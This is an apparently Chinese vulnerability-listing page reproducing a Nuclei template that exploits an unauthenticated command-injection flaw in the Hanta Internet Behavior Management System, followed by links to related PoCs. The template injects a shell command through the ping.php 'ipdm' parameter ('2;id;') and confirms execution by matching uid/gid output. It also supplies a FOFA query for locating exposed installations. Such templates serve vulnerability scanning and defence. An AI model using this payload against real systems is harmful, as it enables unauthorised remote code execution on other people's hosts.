hanta-rce: Hanta Internet Behavior Management System - Remote Code Execution

漏洞描述

PoC代码[已公开]

id: hanta-rce

info:
  name: Hanta Internet Behavior Management System - Remote Code Execution
  author: momika233
  severity: high
  description: Hanta Internet Behavior Management System is vulnerable to RCE.
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="汉塔科技上网行为管理系统"
  tags: hanta,rce,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b2eb460c94cd3f4180c5eaec9b8ddf0102edd1c16a4b5336b114f61218c5efd1022100c8cd23e22555170a1d5b9f5b2c505294f3e29bdd4b5a1bb1b3b8586fd8ad03c8:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• School Fees Payment System /student.php SQL 注入漏洞（CVE-2025-6403）
• POC CVE-2024-53900: Mongoose < 8.8.3 - Remote Code Execution
• POC CVE-2025-8943: Flowise < 3.0.1 - Remote Command Execution
• POC CVE-2021-41419: QVIS NVR/DVR - Remote Code Execution
• POC CVE-2025-1302: JSONPath Plus < 10.3.0 - Remote Code Execution
• POC CVE-2025-51482: Letta Letta 0.7.12 - Remote Code Execution
• POC CVE-2025-6403: Code-Projects School Fees Payment System 1.0 - SQL Injection
• 中成科信票务管理系统 /SystemManager/OrderManager/OrderManager.ashx 文件读取漏洞
• 亿赛通电子文档安全管理系统 /CDGServer3/logManagement/LogDownLoadService SQL 注入漏洞
• HJSoft HCM Human Resources Management System /selfservice/lawresource/downlawbase SQL 注入漏洞（CVE-2025-10197）
• Code-Projects Project Monitoring System SQL注入漏洞
• CodeAstro Gym Management System SQL注入漏洞
• CodeAstro Gym Management System SQL注入漏洞